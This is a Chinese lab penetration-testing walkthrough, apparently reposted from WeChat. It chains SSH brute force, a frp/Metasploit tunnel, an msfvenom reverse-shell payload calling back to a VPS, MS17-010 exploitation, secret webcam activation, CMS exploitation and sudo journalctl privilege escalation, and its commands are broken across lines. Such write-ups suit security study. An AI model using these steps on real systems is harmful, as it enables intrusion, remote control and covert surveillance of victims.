环境拓扑图如下:
一、获取边界权限
通过爆破获取了ssh 权限
使用密码成功登录
这里低权限(先不考虑提权)且只有一个网段,废话不多说,上fscan扫描一下直接搞横向
主机存活5个设备,其中一个小米路由器。啊哈~还有ms17010。
二、建立socks5代理
先来个简单了拿下ms17-010 这台,这里我们先使用frp + msf 配置让148 这台上线做代理机器。
服务端配置(VPS)
客户端(kali)
这里本地和vps的端口我们都设置6666,用于监听。
开启服务端和kali
下面我们制作一个木马
msfvenom
-p
linux/x64/meterpreter/reverse_tcp lhost=
124
.xxx.xxx.
163
lport=
6666
-f elf -o test.elf
Msf 设置监听
接下来我们把木马上传到目标主机上去
scp -P
62626
./test.elf gandalf@目标IP:
/home/g
andalf
最后给权限执行木马,上线成功
明确目标先打ms17-010,那就先搞个socks5 代理
msf设置socks_proxy 代理模块
Kali 设置客户端代理
欧克,测试代理。可成功访问。
三、横向渗透获取第二台主机权限
接下来使用ms17-010 模块进行利用,成功获取252主机
啊哈,偷偷开个摄像头
四、横向渗透获取第三台主机权限
接着拿第三台服务器81,端口扫描如下:
81是个靶场里面有三个cms
使用nuceil 、afrog扫一下,三个cms 都有历史版本漏洞。
接下来使用最容易的漏洞获取81主机的权限
最后获取一个交互shell
python3 -
c
'
import
pty;pty.spawn("/bin/bash")'
五、提权
从配置文件中里面账号tyrell 的账号密码
登录 tyrell账号后,发现可以利用journalctl进行 sudo 提取
sudo
journalctl
!/bin/sh
最后拍拍屁股走人。
End
原文始发于微信公众号(贝雷帽SEC):【Tips+1】MSF+FRP实现内网穿透进行远控
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论